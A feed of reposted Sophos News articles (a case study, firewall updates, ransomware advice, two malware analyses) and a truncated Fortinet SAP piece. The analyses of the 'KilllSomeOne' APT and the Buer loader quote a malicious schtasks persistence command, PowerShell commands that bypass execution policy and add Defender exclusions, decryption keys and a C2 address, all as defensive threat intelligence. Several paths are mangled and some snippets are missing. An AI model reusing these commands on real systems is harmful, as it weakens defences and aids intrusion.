Reducing security admin time by 50% – Sophos News

The customer is a leading provider of advanced software services, including web development, mobile app development, software testing, DevOps, digital marketing, and business intelligence.

With a head office in Costa Rica, their 920 staff are spread across Latin America: primarily Bolivia, Colombia, Costa Rica, and Peru. Within the IT team, five people have some responsibility for cybersecurity.

Cybersecurity: a company priority

The customer considers good cybersecurity as fundamental to their success. As their Chief Technology Officer (CTO), says:

Who would want to do business with a company that is affected by a cyberattack or suffers a data breach?

While it’s very difficult to completely eliminate the possibility of a security event, it’s important that we can give our clients the guarantee that we are making every effort to prevent them, and that if an event does occur the impact will be minimal.”

Common challenges

Like many other organizations, the company faces challenges with cybersecurity resourcing: IT team members have multiple responsibilities, and no one is 100% dedicated to cybersecurity.

Another challenge is budget and justifying investments in cybersecurity, as the benefit is not very visible to other areas of the company.

With cyberattacks on the increase, the company is clear that putting in place security tools that automate most of the processes is essential for their success and will transform the company in general.

A cybersecurity evolution

The customer has been through a cybersecurity evolution: first they moved from a traditional firewall to a simple next-generation appliance, and then they moved to a full Sophos next-generation cybersecurity system.

They now use Sophos XG Firewall at the gateway, Sophos Intercept X endpoint protection, Sophos Email, Sophos Device Encryption, Sophos Wireless Access Points, and Sophos Phish Threat for user education.

The Sophos products share real-time threat, health, and security information, and work together to respond automatically to incidents. All protection is managed through the Sophos Central cloud-based management platform.

Transformation through automation

Prior to Sophos, there was no communication between their firewall and endpoint protection. As their CTO says:

We have gained a lot from the ability of the Sophos products to work together, in particular their ability to automatically isolate compromised computers if an event is detected.

The ability to manage all the Sophos products through a single central platform is also crucial for us, along with the roadmap with further integrations.

Having tools that automatically detect and correct most security events enables our small IT team to manage the company’s security and prevent it being compromised.”

Fifty percent reduction in time spent on security admin

Switching to a Sophos next-gen cybersecurity has reduced by 50% the amount of time the IT team spends on security admin.

Before Sophos, they spent over 20 hours a week. Now, thanks to the ability of the Sophos system to automatically respond to events, security admin takes less than 10 hours a week.

Rather than dealing with all the events themselves, the team now just reviews the alerts provided by the Sophos tools and analyzes how they are being addressed (remediation of events).

The team also greatly appreciates the ability to now manage all their cybersecurity in one place, thanks to the centralized management in Sophos’ cloud-based platform.

Security events are dealt with in seconds

While the company experiences security incidents every day – they get many malicious emails and regular attempts to breach their website – they have a very high level of containment.

In fact, their CTO says that the biggest impact of moving to the Sophos next-gen cybersecurity system is the speed with which security events are now dealt with, reducing their exposure to attacks.

Thanks to the integration between the Sophos firewall and Sophos endpoint protection, most of the events are dealt with in seconds by the system, with compromised devices automatically isolated.

The switch to the Sophos system has also enabled the team to get – for the first time – visibility of all security events, further elevating their ability to secure the organization against attackers.

Cybersecurity: a business enabler

The IT team is very aware of the role of cybersecurity in building trust with their customers and that good cyber defenses are a business differentiator.

As a result of the move to Sophos, their clients now have much greater confidence in their cybersecurity, facilitating business relationships.

See it in action

Watch this demo video to see just how easy day-to-day security management is with a Sophos system.

To try the system for yourself, the easiest way is to start a free trial of one of our products.

And for anything else, or to discuss your own challenges, the Sophos team is here to help.

Net Universe offers all Sophos Devices and subscritpions also consultant services with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit

Multi-firewall reporting comes to Sophos Central – Sophos News

The latest update to Sophos Central Firewall Reporting (CFR) Advanced adds reporting across multiple devices, enabling you to easily get a holistic view into network activity and threats across your entire estate.

Reporting is also more accessible in Sophos Central, with two new direct main menu options under Firewall Management for the Report Hub Dashboard and the Report Generator tools.

There’s also a new drop down box enabling you to select entire groups or individual firewalls to include in the dashboard view and reports.

New main menu items (left) provide direct access to the reporting tools, while a new drop-down selection (center) enables you to determine which firewalls to include in your various reports.

These features are included and automatically enabled at no extra charge for customers with a CFR Advanced subscription.

The new multi-firewall reporting enables easy visibility into the security posture across your entire network with just a few clicks.  You can quickly and easily identify threat activity across all your devices,  including Sandstorm suspicious file sandboxing events, AV, IPS, geo information, and much more.

Get a complete picture of threat activity across your entire network with just a few clicks.

How to get started

You can try CFR for free with limited storage and features for about seven days of data retention to see how it works and then contact your preferred Sophos Partner or Sophos directly to get going on CFR Advanced today.

Setup is easy: simply log into the firewall and select “Central Synchronization” from the main menu to add a firewall to Sophos Central. Then log into Sophos Central to confirm.

Switching from Sophos iView

Sophos iView is a legacy firewall reporting platform that is coming to end of life at the end of this year.  Sophos Central Firewall Reporting provides a far more advanced and scalable reporting and analytics platform that replaces iView, enabling us to accelerate our roadmap and deliver more exciting new functionality sooner.

If you’re still using iView, now is the time to switch. It’s super easy. Get started sending your log data to Sophos Central today.

Additional resources

Net Universe offers all Sophos Devices and subscritpions also consultant services with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit

A new APT uses DLL side-loads to “KilllSomeOne” – Sophos News

Recently, we’ve observed several cases where DLL side-loading was used to execute the malicious code. Side-loading is the use of a malicious DLL spoofing a legitimate one, relying on legitimate Windows executables to load and execute the malicious code.

While the technique is far from new—we first saw it used by (mostly Chinese) APT groups as early as 2013, before cybercrime groups started to add it to their arsenal—this particular payload was not one we’ve seen before. It stands out because the threat actors used several plaintext strings written in poor English with politically inspired messages in their samples.

The cases are connected by a common artifact: the program database (PDB) path. All samples share a similar PDB path, with several of them containing the folder name “KilllSomeOne.”

Based on the targeting of the attacks—against non-governmental organizations and  other organizations  in Myanmar— and other characteristics of the malware involved, we have reason to believe that the actors involved are a Chinese APT group.

Shell game

We have identified four different side-loading scenarios  that were used by the same threat actor. Two of these delivered a payload carrying a simple shell, while the other two carried a more complex set of malware. Combinations from both of these sets were used in the same attacks.


Scenario 1


Aug.exe clean loader (originally MsMpEng.exe, a Microsoft antivirus component
mpsvc.dll malicious loader
Groza_1.dat encrypted payload

The main code of the attack is in mpsvc.dll ‘s exported function ServiceCrtMain. That function loads and decrypts the final payload, stored in the file  Groza_1.dat:

The encryption is simple XOR algorithm, where the key is the following string: Hapenexx is very bad

While analyzing the binary for the loader used in this attack type, we found the following PDB path:

C:UsersgussDesktopRecent WorkUU_PKilllSomeOne.1msvcpReleasempsvc.pdb

Scenario 2


AUG.exe clean loader (renamed Microsoft DISM.EXE)
dismcore.dll malicious loader
Groza_1.dat encrypted payload

The loader has the following PDB path:

C:UsersgussDesktopRecent WorkUU_PKilllSomeOne.1msvcpReleaseDismCore.pdb

The main code is in the exported function DllGetClassObject.

It uses the same payload name (Groza_1.dat) and password (Hapenexx is very bad) as the first case, only this time both the file name and the decryption key are themselves encrypted with a one-byte XOR algorithm.

In both of these cases, the payload is stored in the file named Groza_1.dat. The content of that file is a PE loader shellcode, which decrypts the final payload, loads into memory and executes it. The first layer of the loader code contains unused string: AmericanUSA.

It has a PE loader shellcode, that decrypts the final payload, loads it into memory and executes it.The final payload is a DLL file that has the PDB path:

C:UsersgussDesktopRecent WorkUDP SHELL.7 DLLUDPDLLReleaseUDPDLL.pdb

The DLL is a simple remote command shell, connecting back to a server with the IP address on port 9999. The code contains a string that is used to generate a key to decrypt the content of data received from the command and control server: “Happiness is a way station between too much and too little.”

More ways to KillSomeone

The other two observed types of KillSomeOne DLL side-loading deliver a fairly sophisticated installer for the simple shell—one that establishes persistence and does the housekeeping required to conceal the malware and prepare file space for collecting data. While they carry different payload files (adobe.dat in one case, and x32bridge.dat in the other), the executables derived from these two files are essentially the same; both have the PDB path:

C:UsersgussDesktopRecent WorkUU_PKilllSomeOne.1Function_hexhexReleasehex.pdb

Scenario 3


SafeGuard.exe clean loader (Adobe component)
hex.dll malicious loader
adobe.dat encrypted payload

The malicious loader loads the payload from the file named adobe.dat, and uses a similar XOR decryption to that used in Scenario 1. The only significant difference is the encryption key, which in this case is the string HELLO_USA_PRISIDENT.

Scenario 4 Components
Mediae.exe clean loader
x32dbg.exe  clean loader
msvcp120.dll clean DLL (dependency of x32dbg)
msvcr120.dll clean DLL (dependency of x32dbg)
x32bridge.dll malicious loader
x32bridge.dat payload

In Scenario 4, the PDB path of the loader is changed to:


The main code is in the exported function BridgeInit.

The payload is stored in the file x32bridge.dat, and it is encoded with a XOR algorithm, the key is the same as in case 3—HELLO_USA_PRISIDENT.

I think I smell a rat

The initial stage extracted from the two payload files in both these scenarios is the installer,  which is loaded into memory from the .dat file by the initial malicious DLL.  When loaded, it drops all components for another DLL side-loading cases to several directories:

  • C:ProgramDataUsersDataWindows_NTWindowsUserDesktop
  • C:UsersAll UsersUsersDataWindows_NTWindowsUserDesktop
  • %PROFILE%Users
  • C:UsersPublicPublic Media

The installer also assigns the files the “hidden” and “system” attributes to conceal them from users.

Some of the components dropped by the KillSomeOne installer payload.

The installer then closes the executable used in the initial stage of the attack, and starts a new instance of explorer.exe to side-load the dropped DLL component.  This is an effort to conceal the execution, since the targeted system’s process list will only show another explorer.exe process (and not the renamed clean executable, which might stand out upon examination).

The installer also looks  for a running process with a name starting with “AAM,” then kills the process and deletes the file associated with it in C:ProgramData and C:UsersAll Users. This is likely because earlier PlugX side-loading scenarios used the clean files name “AAM Updates.exe”, and this mechanism removes earlier infections. It also takes several steps to ensure persistence, including the creation of a  task that executes the side-loading executable that began the deployment:

schtasks /create /sc minute /mo 5 /tn LKUFORYOU_1 /tr

Additionally, it creates a registry auto-run key that does the same thing:


The side loaded DLL uses an event name to identify itself when running—LKU_Test_0.1 if running from C:ProgramData, or LKU_Test_0.2 if running from %USERHOME%.

The installer also configures the system for data exfiltration. On removable and non-system drives, it creates a desktop.ini file with settings to create a folder to the “Recycle Bin” type):


It then copies files to the Recycle Bin on the drive in the subfolder ‘files,’ and also collects system information, including volume names and free disk space. And lastly, it copies all the .dat files dropped—including those used in the other side-loading scenarios—into the installation directories, Then the installer loads akm.dat, the file containing the next payload—the loader.

The loader is a simple DLL file, which, unlike the rest of the payloads, is not encrypted. It is a plain Windows PE file with a single export name, Start— the main function in the DLL, which builds a command line with the location of AUG.exe (the renamed Microsoft DISM.EXE):


Then in executes the command line, which would invoke side-loading scenario 1 or 2.


Mixed signals

The types of  perpetrators behind  targeted attacks in general are not a homogeneous pool. They come with very different skill sets and capabilities. Some of them are highly skilled, while  others don’t have skills that exceed the level of average cybercriminals.

The group responsible for the attacks we investigated in this report don’t clearly fall on either end of the spectrum. They moved to more simple implementations in coding—especially in encrypting the payload—and the messages hidden in their samples are on the level of script kiddies. On the other hand, the targeting and deployment is that of a serious APT group.

Based on our analysis, it’s not clear whether this group will go back to more traditional implants like PlugX or keep going with their own code. We will continue to monitor their activity to track their further evolution.

SophosLabs would like to acknowledge the contributions of Mark Loman and Vikas Singh to this report.

Net Universe offers all Sophos Devices and subscritpions also consultant services with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit

Multi-Firewall Reporting comes to Sophos Central – Release Notes & News – XG Firewall

The latest update to Sophos Central Firewall Reporting (CFR) Advanced enables reporting across multiple devices, enabling you to easily get a holistic view into network activity and threats across your entire estate.

Reporting is also more accessible in Sophos Central, with two new direct main menu options under Firewall Management for the Report Hub Dashboard and the Report Generator Tools.

There’s also a new drop down box enabling you to select entire groups or individual firewalls to include in the dashboard view and reports.

New main menu items (left) provide direct access to the reporting tools, while a new drop-down selection (center) enables you to determine which firewalls to include in your various reports.

These features are included and automatically enabled at no extra charge for customers with a CFR Advanced subscription.

The new multi-firewall reporting enables easy visibility into the security posture across your entire network with just a few clicks. You can quickly and easily identify threat activity across all your devices, including Sandstorm suspicious file sandboxing events, AV, IPS, geo information, and much more.

Get a complete picture of threat activity across your entire network with just a few clicks.

How to Get Started

You can try CFR for free with limited storage for about 7 days of data retention to see how it works and then contact your preferred Sophos Partner or Sophos directly to get going on CFR Advanced today.

Setup is easy… simply log into the firewall and select “Central Synchronization” from the main menu to add a firewall to Sophos Central. Then login to Sophos Central to confirm.

Switching from Sophos iView

Sophos iView is a legacy firewall reporting platform that is coming to end of life soon. Sophos Central Firewall Reporting provides a far more advanced, scalable reporting and analytics platform that replaces iView enabling us to accelerate our roadmap and deliver more new functionality sooner. If you’re still using iView, now is the time to switch. It’s super easy. Get started sending your log data to Sophos Central today.

Resources you can use

Net Universe offers all Sophos Devices and subscritpions also consultant services with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit

5 critical steps to take – Sophos News

The outbreak of COVID-19 has put cyberattacks on healthcare providers into hyperdrive. Factors contributing to such attacks include, but aren’t limited to:

  • Decentralized business operations
  • Emergency COVID-19 facilities set up without planned security of IT infrastructure
  • A significant rise in the amount of patient health data stored by healthcare organizations
  • Telehealth, and remote workers flung around the world almost overnight, opening up security gaps

Ryuk ransomware, in particular, has seen a resurgence recently. Sophos recently identified a new spam campaign linked to the Ryuk actors, and our Managed Threat Response team assisted an organization in mitigating a Ryuk attack, providing insight into how the Ryuk actors’ tools, techniques, and practices have evolved.

The investigation showed an evolution of the tools used to compromise targeted networks and deploy the ransomware. But what was more notable was how quickly the attacks can move from initial compromise to ransomware deployment. Within three and a half hours of a target opening a phishing email attachment, attackers were already conducting network reconnaissance. Within a day, they had gained access to a domain controller and were in the early stages of an attempt to deploy ransomware.

The evasion techniques of ransomware are rapidly changing. In recent years, ransomware attacks have trended away from brute-force, large-scale attacks to focused, planned, and manually executed attacks that are much harder to detect and block. Humans are handcrafting artisanal malware.

The criminals have hybridized their attacks, combining automation to find victims with gaps in their defenses. Exposed servers with Remote Desktop Protocol (RDP) enabled, administrators without multi-factor authentication for remote access, unpatched web servers, or even these same issues at a trusted partner or service provider are enough to put your network, systems, and resources under ransom.

Here are the five things healthcare providers can do to protect against ransomware attacks:

  1. Maintain IT hygiene. Make sure you’re practicing basic IT hygiene, which includes installing all the latest patches, shutting down RDP entirely (or putting it behind a VPN), and making regular back-ups and keeping them offsite where attackers can’t find them. It also includes applying multifactor authentication to services hosting the most sensitive data in your organization. These are just some of the fundamental steps you can take to protect yourself and your network today.
  2. Educate your users. Teach them about the importance of strong passwords and roll out two-factor authentication wherever you can. Educate them on phishing, which is one of the main delivery mechanisms for ransomware.
  3. Minimize the risk of lateral movement within your network. Segment LANs into smaller, isolated zones or VLANs that are secured and connected by the firewall. Be sure to apply suitable IPS policies to rules governing the traffic traversing these LAN segments in order to prevent exploits, worms, and bots from spreading between LAN segments. And if an infection hits, automatically isolate infected systems until they can be cleaned up.
  4. Use endpoint detection and response (EDR) tools with your endpoint protection. Targeted ransomware today isn’t just about stopping one piece of malware; it’s about stopping an active adversary and disrupting the attack chain that puts them in a position to run the malware. Ensure every endpoint is protected and up to date. A device not functioning correctly may not be protected and could be vulnerable to a ransomware attack. Use tools like EDR, which allow you to ask detailed questions so that you can hunt for active adversaries and identify advanced threats in your network. Once you do, EDR also helps you take appropriate actions quickly to stop such threats.
  5. Close the gap with human intervention. Computers, automation, and tools are amazing but human intellect, pattern recognition, and our ability to apply context provide an even more formidable defense. Managed detection and response (MDR) services are critical here. Pairing your internal IT and security teams with an external team of elite threat hunters and response experts helps provide actionable advice for addressing the root causes of recurring incidents.

Sophos Intercept X Advanced with EDR

Sophos Intercept X Advanced with EDR includes all the features you need to help protect your organization from ransomware attacks like Ryuk, Sodinokibi, Maze, and Ragnar Locker.

Intercept X includes anti-ransomware technology that detects malicious encryption processes and shuts them down before they can spread across your network. Anti-exploit technology stops the delivery and installation of ransomware, deep learning blocks ransomware before it can run, and CryptoGuard prevents the malicious encryption of files, rolling them back to their safe states.

Furthermore, Sophos EDR helps keep your threat hunting and IT operations hygiene running smoothly across your entire estate. Sophos EDR empowers your team to ask detailed questions to identify advanced threats, active adversaries, and potential IT vulnerabilities, and then quickly take appropriate action to stop them. It enables you to detect adversaries lurking in your network and waiting to deploy ransomware that may have gone unnoticed.

Sophos Managed Threat Response (MTR)

The Sophos MTR service adds human expertise to your layered security strategy. An elite team of threat hunters proactively looks for and validates potential threats on your behalf. If authorized, they take action to disrupt, contain, and neutralize threats, and provide actionable advice to address the root causes of recurring incidents.

Sophos Rapid Response

If your organization is under attack and needs immediate incident response assistance, Sophos can help.

Delivered by an expert team of incident responders, Sophos Rapid Response provides lightning-fast assistance with identification and neutralization of active threats against organizations. On-boarding starts within hours, and most customers are triaged within 48 hours. The service is available for both existing Sophos customers as well as non-Sophos customers.

The Sophos Rapid Response team of remote incident responders quickly takes action to triage, contain, and neutralize active threats. Adversaries are ejected from your estate to prevent further damage to your assets.

Related reading

Net Universe offers all Sophos Devices and subscritpions also consultant services with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit

Under attack? Sophos Rapid Response is here to help  – Sophos News

Experiencing an active cyberattack and defending against a potential breach can be an incredibly stressful time for an organization. However, many internal IT security teams lack the experience necessary to successfully respond to potential breaches, and getting immediate help from an outside resource can be next to impossible… until today.   

We’re thrilled to announce the availability of Sophos Rapid Response, a new service which provides lightning-fast assistance with active threats, delivered by an expert team of incident responders.

The service, which has already helped dozens of organizations while in pilot mode, is available to both existing Sophos customers as well as non-Sophos customers.

Seconds matter

When under attack, time is of the essence. That’s why the Rapid Response service is built to be fast. How fast? Onboarding starts within hours, and most customers are triaged in 48 hours.

“I’ve seen firsthand how the Sophos Rapid Response team is able to cut through all of the noise to quickly remediate security incidents within hours, and the feedback from customers has been nothing but exceptional,” said Jeremy Weiss, cybersecurity practice lead at CDW.

The Rapid Response team are experts at quickly stopping advanced attacks, minimizing damage and costs, and reducing recovery time. Regardless of whether it’s a ransomware infection, network compromise, or unauthorized access attempting to circumvent security controls, they’ve seen it all and stopped it all.

A new type of incident response service

Rapid Response is an industry first, offering a fixed-fee remote incident response service that responds to active cybersecurity attacks throughout its entire 45-day term of engagement.

There are no hidden fees or escalating costs, and customers are protected for the full 45-day subscription term. Should the threat return or a related threat emerge, Rapid Response will respond at no additional cost.

Unlike traditional incident response (IR) services, which are priced hourly, you and the Rapid Response team have the same goal: to get your organization out of the danger as quickly as possible. And since the service is delivered remotely, response actions can be initiated on day one.

“A charitable organization providing housing and support services to thousands of vulnerable adults was hit by ransomware, taking down operations at all of its more than 40 facilities. The organization called us for help, and we immediately deployed Sophos Rapid Response. Working together with Sophos Rapid Response, we were able to get them back up and running quickly so they could continue serving those in need,” said Steve Weeks, president at Netcetera.“

More information about Rapid Response can be found on our website.

Interested in ongoing managed detection and response? Sophos Managed Threat Response (MTR) provides ongoing 24/7 threat hunting, detection, and response capabilities delivered by an expert team as a fully-managed service.

Net Universe offers all Sophos Devices and subscritpions also consultant services with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit

inside the Buer Loader malware-as-a-service – Sophos News

During our investigation of a Ryuk attack in September 2020, we found the Ryuk actors had used a relatively new method for gaining initial access: a malware dropper called Buer. The September attack was part of a low-volume spear phishing attack tracked by Sophos. Over the next month, it evolved into a much larger spam campaign, carrying Buer as well as a number of other types of “loader” malware, as the Ryuk operators sought to ramp up their attacks.

First introduced in August of 2019, Buer is a malware-as-a-service offering that is used to deliver whatever package the service customer desires, providing initial compromise of targets’ Windows PCs and allowing them to establish a digital beachhead for further malicious activity. Buer has previously been tied to banking trojan attacks and other malware deployments—and now, apparently, has been embraced by ransomware operators. In many ways, Buer is positioned as an alternative to Emotet and Trickbot’s emerging Bazar loader (which both use similar behaviors to deploy).

Full-service bots

Buer was first advertised in a forum post on August 20, 2019 under the title “Modular Buer Loader”, described by its developers as “a new modular bot…written in pure C” with command and control (C&C) server code written in .NET Core MVC (which can be run on Linux servers). For $350 (plus whatever fee a third-party guarantor takes), a cybercriminal can buy a custom loader and access to the C&C panel from a single IP address—with a $25 charge to change that address. Buer’s developers limit users to two addresses per account.

The bot code, compiled for each user specific to a download, has an advertised size between 22 and 26 kilobytes—though the sample we looked at was about 40 kilobytes after being unpacked from its dropper. The bot can be configured for execution either as a 32-bit Windows executable or as a DLL.

The C&C can be used to track the number of successful downloads in a campaign, and to assign tasks to bots by filters such as the country they’re in, the “bitness of the operating system” (32 or 64 bit), the number of processors on the infected machine and the level of permissions obtained by the bot. Bots detected to be operating within the Commonwealth of Independent States will be shut down—which is a common behavior of malware developed in the ex-USSR region, as an attempt to avoid attention from local authorities.

The “file manager in the command and control “panel” for the Buer loader bot. Files can be uploaded for distribution here—the maximum size is 28 megabytes.
The Buer panel tracks installations by operating system, CPU, “bitness” (32 or 64), activity, and which geographic region they’re in based on localization settings and other fingerprinting.

Tasks can be scheduled to run for a specific amount of time, or suspended upon command, with telemetry for the task sent back to the panel. The panel can also be used to deploy updates to bots, including (at least based on the advertisement) deployment of modules, with prebuilt modules to be added “over time” as part of the service. And of course, setup consulting and technical support are provided.

Prize inside every doc

flow chart
Buer loader attack flow.

Sophos’ Rapid Response team discovered a sample of Buer at the root cause of a September Ryuk attack. The loader was delivered by a malicious document stored on Google Docs, which required the victim to enable scripted content to activate—a behavior similar to Emotet and other loader attacks via malicious spam emails but leveraging cloud storage to make forensic analysis more difficult.

We collected other messages from the same campaign in Sophos’ spam traps during the same period. The messages all used Google Docs files, and were sent using a popular commercial email distribution service—further obscuring the source and the link associated with the malicious document.

screenshot of email
An example of the initial run of Buer bot distributing spear phishes.

The payload of that malicious document was named print_document.exe. Like other Buer dropper samples we’ve analyzed, it was a digitally signed binary, using a stolen and now-revoked certificate issued by DigiCert to “NEEDCODE SP Z O O,” a Polish software developer, issued on September 17, 2020. The dropper was built using modified code from a Microsoft sample application for image capture, AcquireTest, using the code’s function for “file enumeration” to delete and drop code.

The dropper does a number of things to ensure proper delivery. It first checks for the presence of a debugger to evade forensic analysis, and then checks language and localization settings to determine the geographic region of the system being attacked. If the settings match a CIS country, it will exit without depositing the malware. Otherwise, the dropper then dumps the Buer bot in memory and executes it.

Intriguingly, the Buer Loader and Ryuk ransomware uses same shellcode loader to execute the unpacked malware code in memory:

This may not be an indication of shared authorship; the developers may have simply used the same sample code as their source.

Upon launch, the Buer bot does a number of things to set up shop. The bot executes two sets of PowerShell commands—one to bypass execution policies to allow PowerShell commands executed by the bot to go through without warnings (Set-ExecutionPolicy Bypass), and another (add-mppreference -exclusionpath) to make changes to Windows Defender’s exclusion list—concealing files it downloads from Windows’ built-in malware protection.

Buer queries the Windows Registry for the value of MicrosoftCryptographyMachineGuid to get the unique identifier for the infected machine.  And the bot calls home, interacting with the command and control server (in this case, 104[.]248.83.13) through a series of secure HTTP “POST” and “GET” messages.

Then there’s the “loader” part of what Buer does. The files packaged to be dropped by Buer are retrieved from a designated source and dropped in a folder created in the C:ProgramData directory—the directory name is created programmatically and varies with deployments. In the September attack, Buer was used to deploy a Cobalt Strike beacon to the infected computer, which was then in turn used to exploit the network and launch a Ryuk attack.

Mixing it up

The malicious spam campaign that resulted in the Buer loader and Ryuk ransomware infections evolved at the end of September, as we observed the actors behind it shift the same tactics away from low volume on SendGrid to mail sent through Internet hosting providers—predominantly through a single Russian ISP. Then in October, the volume of spam rose dramatically—shifting away from Google Docs (as Google shut down the old files for terms of service violations) to another commercial email and file delivery service.

A somewhat less targeted spam message with a link to a malicious document stored by Constant Contact.

In the last two phases, while the tactics remained similar and other hallmarks suggested the spam actor was the same, multiple types of “dropper” malware were deployed as attachments. In addition to Buer, samples of Bazar and ZLoader were also found, with delivery payloads varying. For one Bazar loader payload, the attackers used a password-protected Excel spreadsheet. During the same timeframe, Bazar and ZLoader were also known to be involved in Ryuk attacks.

It’s clear that Ryuk is back, and that the actors behind it are evolving their methods for initial compromise, using multiple loader bots to achieve initial access. It’s not clear if the same actor is behind all of these attacks, using multiple malware-as-a-service platforms to deliver Ryuk, or if there are multiple Ryuk actors. But the similarity in techniques across these campaigns suggests that there is at least coordination between them: they use targeted emails with cloud-based malicious documents and a lure to spur immediate action (often related to wages or taxes).

The best mitigation for these attacks is to reinforce training on phishing attacks. While these malicious emails are targeted, they are usually awkwardly worded and use the target’s name in odd ways. Careful reading of the email will tip off most educated users. But these attacks are growing in sophistication, and even well-trained users may eventually click on the wrong link in an email if spam detection doesn’t catch them first.

Sophos detects and blocks Buer both with custom detections (Troj/BeurLd-A) and machine learning, and detects the spear phishing messages as spam.

Sophos would like to acknowledge the contributions of Peter Mackenzie, Elida Leite, Syed Shahram and Bill Kearny of the Sophos Rapid Response team, and Anand Ajjan, Brett Cove and Gabor Szappanos of SophosLabs for their contributions to this report


Net Universe offers all Sophos Devices and subscritpions also consultant services with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit

XG Firewall v18 performance gains mean more traffic and better security – Sophos News

XG Firewall v18 includes several performance gains that will breathe new life into your network, enabling you to handle more traffic and better secure it.

If you haven’t upgraded to XG Firewall v18 already, you’re going to want to do so as soon as possible to take advantage of the substantial performance benefits waiting for you.

What are the gains and where do they come from?

Consider these potential performance boosts available by upgrading to XG Firewall v18:

Those are some impressive performance improvements!

One of the most exciting enhancements to XG Firewall in v18 was the introduction of the new Xstream Architecture, with its all-new streaming DPI engine, advanced TLS 1.3 inspection solution, and Network Flow FastPath.

Let’s look at how the Xstream Architecture upgrades your performance:

Trusted traffic FastPath acceleration

The new Xstream Network Flow FastPath is all about performance. It directs trusted traffic that doesn’t require security scanning into a fast lane through the system. This not only minimizes latency and accelerates application traffic through the firewall, it also has the added benefit of not engaging the DPI engine for deep-packet inspection of trusted traffic.

The impact of fast-pathing is up to a 5x improvement in firewall traffic throughput! Of course, with a blend of real-world traffic mixes, not all applications qualify for trusted traffic FastPath acceleration, but if a substantial portion of your traffic can be accelerated on the FastPath, you could increase your firewall’s security scanning capacity while allowing more trusted traffic. That’s a win-win.

Be sure to see how to make the most of the Network Flow FastPath on your network to learn how this works and how to set it up optimally.

TLS inspection speed

The new Xstream TLS inspection solution also brings a tremendous boost in decrypting and inspecting encrypted traffic flows, with up to a 2x improvement in performance. And when you combine the added performance with the very granular and easy to manage TLS inspection policies, you can be sure you’re only inspecting traffic that really needs it – and now do it faster than ever.

See how to make the most of Xstream TLS Inspection on your XG Firewall.

IMIX traffic performance

Internet Mix or IMIX is an often used reference in measuring typical real-world internet network traffic performance, making it a good metric to consider when looking at performance.

The new Xstream architecture in XG Firewall v18 brings a substantial boost in performance to this important metric. On our mid-range firewall models, the gains are over 100%, with the average across the XG Series line being a 57% improvement in performance.

This is all thanks to optimizations in the packet processing flow, DPI engine, and Network Flow FastPath. It’s an incredible real-world improvement in traffic processing performance.

Other common traffic performance measurements also benefit from the Xstream architecture in v18, including raw firewall performance, IPS, AV, application control, and malware protection.

Get the latest XG Firewall brochure to see the latest performance metrics and how your XG Series model stacks up.

SSL VPN capacity

Further optimizations to our SSL engine in XG Firewall v18 MR3 bring some dramatic improvements to remote access SSL VPN capacity, with up to 6x the number of connections possible on our higher-end appliances.

Increases are more modest at the entry-level, but on a typical mid-range device like the XG 310, the capacity has tripled! This is great news for everyone managing a remote workforce these days.

Check out the other great enhancements with remote-access VPN.

Upgrade today

If you haven’t already, upgrade to XG Firewall v18 today. It’s a free performance boost, and you get a ton of great new protection and networking features.

Be sure to take advantage of all the resources available, including the recent “Making the Most of XG Firewall v18” article series that covers all the great new capabilities in XG Firewall v18:

Net Universe offers all Sophos Devices and subscritpions also consultant services with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit

Fortinet Secures the Intelligent Enterprise Running SAP

SAP is among the world’s largest software companies, with some 92% of the Forbes Global 2000 using at least some of their enterprise application solutions. Most of these companies will deploy SAP S/4HANA in the cloud—either public or private. In fact, by 2027 some SAP customers will need to migrate to SAP S/4HANA as they have announced the end-of-life of older versions of their integrated application solutions (SAP Business Suite). Fortinet’s Dynamic Cloud Security offerings provide organizations the key security elements they require to help secure their SAP S/4HANA cloud deployments during this transition.

Securing SAP Environments With Fortinet’s Dynamic Cloud Security

Properly securing any enterprise application solution, such as Enterprise Resource Planning (ERP), is increasingly important for organizations. SAP Enterprise application solutions are a suite of integrated tools used to collect, store, manage, and interpret data from many business activities. For management teams, ERP is the key to understanding and managing their business. But for cybercriminals, ERP systems are an attractive target because ERP systems share data across every facet of the organization. 

Fortinet has been working with leading ERP vendors of enterprise application solutions to provide carefully engineered and well-tested architectures for securing such systems, both in and out of the cloud. For example, Fortinet has recently published Oracle validated security architectures for Oracle solutions. Fortinet’s Dynamic Cloud Security portfolio is designed to help SAP customers secure their workloads across environments. 

“Zuellig Pharma uses Fortinet’s Dynamic Cloud Security offerings to protect our SAP deployments across public and private cloud infrastructures,” shared Daniel Laverick, Head of SAP & IT Solutions at Zuellig Pharma. “Fortinet offers the broadest set of security offerings for securing workloads both on-premises and on any cloud. With Fortinet, we’ve gained unified visibility and control without hindering our ability to deliver seamless user experience to our customers worldwide.” 

Securely Transitioning to SAP S/4HANA

A few years ago, SAP announced end-of-support for older SAP solutions by 2025, including:

  • ERP 6.0
  • Customer Relationship Management 7.0
  • Supply Chain Management 7.0
  • Supplier Relationship Management 7.0 applications
  • Business Suite powered by SAP HANA

S/4HANA was specifically designed to run in a virtualized environment like the cloud. But not all clouds are the same. As a result, there are actually different versions of the software designed for public and private cloud deployments. In many cases, customers will opt for a hybrid model, where the majority of SAP systems run in the cloud while some dedicated production systems remain on-premises. This can add complexity in terms of security across these deployments. Fortunately, Fortinet solutions support both public and private clouds, ensuring security for hybrid, multi-cloud, and on-premises environments.

“Fortinet’s Dynamic Cloud Security portfolio—including FortiWeb and FortiCWP—enables our customers to confidently secure their SAP data and applications,” shared Thomas Grimm, CEO at AddOn AG – Germany. “Through Fortinet, SAP workloads are protected consistently across the application, network, and platform stack, addressing the expanded attack surface with a consistent offering.”

Christian Steden, Managing Director at Evonet said, “As a Fortinet partner, Evonet provides our customers Fortinet’s broad range of advanced security technologies to protect their SAP deployments. Fortinet’s offerings natively integrate with SAP, enabling automated, centralized management and visibility that reduces management overhead for our customers.”

Addressing the ERP Threat Landscape with Fortinet’s Dynamic Cloud Security

